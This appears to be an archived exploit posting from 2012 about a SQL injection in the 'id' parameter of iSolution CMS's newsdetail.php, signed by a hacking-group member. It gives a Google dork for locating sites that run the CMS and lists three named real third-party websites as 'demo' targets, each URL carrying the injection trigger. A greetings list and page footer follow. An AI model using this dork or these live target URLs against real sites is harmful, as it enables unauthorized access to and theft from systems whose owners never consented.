iSolution CMS suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
1a08a1a12a801bc316f73078633539d6a650fbcb8bc90023cfe06640eece4665#######################################################
# #
# ________ .__ __________________ #
# \_ ___ \_______|__| _____ \_____ \______ \ #
# / \ \/\_ __ \ |/ \ _(__ <| _/ #
# \ \____| | \/ | Y Y \/ \ | \ #
# \______ /|__| |__|__|_| /______ /____|_ / #
# \/ \/ \/ \/ #
# #
#######################################################
#
#
# Exploit Title: iSolution Cms Remote Sql Injection Vulnerability
#
# Google Dork: Intext:"Powered by iSolution"
#
# Date: 08/29/2012
#
# Author: Crim3R
#
# Site : Http://Ajaxtm.com/
#
# Vendor Home : http://www.isolutiononline.com/
#
# Tested on: all
#
==================================
id parametr in newsdetail.php is Vulnerable to sql injection
D3M0 :
http://www.dezyneecole.com/newsdetail.php?id=8'
http://archedu.org/newsdetail.php?id=117'
http://www.dataglobal.co.id/newsdetail.php?id=36'
===============Crim3R@Att.Net=========
[+] Greetz to All Ajaxtm Security Member
Cair3x - HUrr!c4nE - black.shadowes - hadihadi - iM4n - irsdl - the-0utl4w - Expl0its - Mormoroth - Mikili - Black.Spook -
S3Ri0uS - Zalatan - Net.Edit0r - Ciph3r - A.u.r.A
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed